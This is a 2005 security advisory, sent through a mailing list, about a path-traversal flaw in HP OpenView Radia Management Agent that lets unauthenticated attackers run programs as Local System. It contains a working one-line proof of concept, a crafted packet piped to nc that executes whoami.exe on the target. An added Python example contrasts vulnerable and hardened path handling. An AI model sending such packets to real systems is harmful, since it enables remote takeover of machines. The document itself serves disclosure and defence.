[NT] HP OpenView Radia Management Agent Command Execution
From: SecuriTeam <support@securiteam.com>
To: [email protected]
Date: 1 Aug 2005 18:40:37 +0200
Subject: [NT] HP OpenView Radia Management Agent Command Execution
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050801164038.C851F58CB@mail.tyumen.ru>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com




  HP OpenView Radia Management Agent Command Execution
------------------------------------------------------------------------


SUMMARY

The HP (http://www.hp.com) Radia Management Agent is part of HP's OpenView 
Radia suite of software. By connecting to the agent's listening TCP port and 
sending a crafted packet, an unauthenticated attacker can run arbitrary code 
on the target machine.

DETAILS

Vulnerable Systems:
 * HP OpenView Radia Management Portal versions 2.x and 1.x running Radia Management Agent

HP OpenView Radia Management Portal runs as a Windows service (RMA) with 
Local System privileges. The RMA service listens on a TCP port that is not 
fixed. In the example below, the service was listening on TCP port 1065.

Proof of Concept:
By connecting to the TCP port and sending a crafted packet, it is possible 
to traverse out of C:\Program Files\Novadigm (the apparent working 
directory) and run any executable located on the same logical disk 
partition, in this case the C: drive.

C:\>sc queryex rma

SERVICE_NAME: rma
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 1032
        FLAGS              :

C:\>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:1065           0.0.0.0:0              LISTENING       1032

bash$ printf "\x00\x00\x00../../windows/system32/whoami.exe\x00" | nc -v xx.xx.xx.xx 1065

host.domain [xx.xx.xx.xx] 1065 (?) open
nt authority\system

The output from whoami.exe clearly demonstrates that it is possible for a 
remote attacker to execute arbitrary system commands with Local System 
privileges without authentication.
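The root cause described above is a path taken from the network and joined to the agent's working directory without checking that the result stays inside it. The Python below, an added illustration and not HP's or NGSSoftware's code, shows the vulnerable behaviour beside a hardened resolver that canonicalises the path with Windows semantics (ntpath, so it runs on any platform) and refuses anything that escapes the base directory. The request framing helper assumes the layout visible in the advisory's packet (three leading bytes, then a NUL-terminated path); that framing, the base directory and all function names are assumptions of this example.

```python
import ntpath

# Assumed working directory, taken from the advisory's description.
BASE_DIR = r"C:\Program Files\Novadigm"


def decode_request(packet: bytes) -> str:
    """Pull the NUL-terminated path out of a request framed like the advisory's packet.

    Hypothetical framing: three leading bytes (treated as opaque here), then the path,
    then a NUL terminator. Only the path matters for the confinement check."""
    if len(packet) < 4:
        raise ValueError("packet too short")
    body = packet[3:]
    end = body.find(b"\x00")
    if end == -1:
        raise ValueError("path not NUL-terminated")
    return body[:end].decode("ascii")


def vulnerable_resolve(base_dir: str, requested: str) -> str:
    """The behaviour the advisory describes: join and normalise, no containment check.

    '../../windows/system32/whoami.exe' collapses to C:\\windows\\system32\\whoami.exe."""
    return ntpath.normpath(ntpath.join(base_dir, requested))


def is_confined(base_dir: str, candidate: str) -> bool:
    """True iff the normalised candidate lies inside base_dir (case-insensitive NT paths).

    commonpath is used instead of a string-prefix test so that a sibling directory
    such as C:\\Program Files\\Novadigm2 is not mistaken for a child of the base."""
    base = ntpath.normcase(ntpath.normpath(base_dir))
    cand = ntpath.normcase(ntpath.normpath(candidate))
    try:
        return ntpath.commonpath([base, cand]) == base
    except ValueError:
        # Raised for different drives or a mix of absolute and relative paths.
        return False


def hardened_resolve(base_dir: str, requested: str) -> str:
    """Hardened form: reject absolute or drive-qualified input and anything that escapes base_dir."""
    if ntpath.isabs(requested) or ntpath.splitdrive(requested)[0]:
        raise PermissionError("absolute or drive-qualified path rejected")
    candidate = ntpath.normpath(ntpath.join(base_dir, requested))
    if not is_confined(base_dir, candidate):
        raise PermissionError(f"path escapes {base_dir}: {requested!r}")
    return candidate


if __name__ == "__main__":
    # Constructed packet of the shape shown in the advisory's proof of concept.
    pkt = b"\x00\x00\x00../../windows/system32/whoami.exe\x00"
    path = decode_request(pkt)
    print("vulnerable:", vulnerable_resolve(BASE_DIR, path))
    try:
        hardened_resolve(BASE_DIR, path)
    except PermissionError as exc:
        print("hardened:", exc)
```

The hardened resolver still does not address the other half of the problem the advisory points out: the service runs as Local System and accepts requests without authentication, so confining the path only limits which binaries can be launched, not who may launch them.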

Vendor Status:
HP has developed a patch to fix the problem. More information can be found 
in their security bulletin HPSBMA01138: 
http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01138

Disclosure Timeline:
Date of initial advisory: 28 April 2005
Date of full advisory: 28 July 2005


ADDITIONAL INFORMATION

The information has been provided by NGSSoftware Insight Security Research 
(nisr@nextgenss.com).



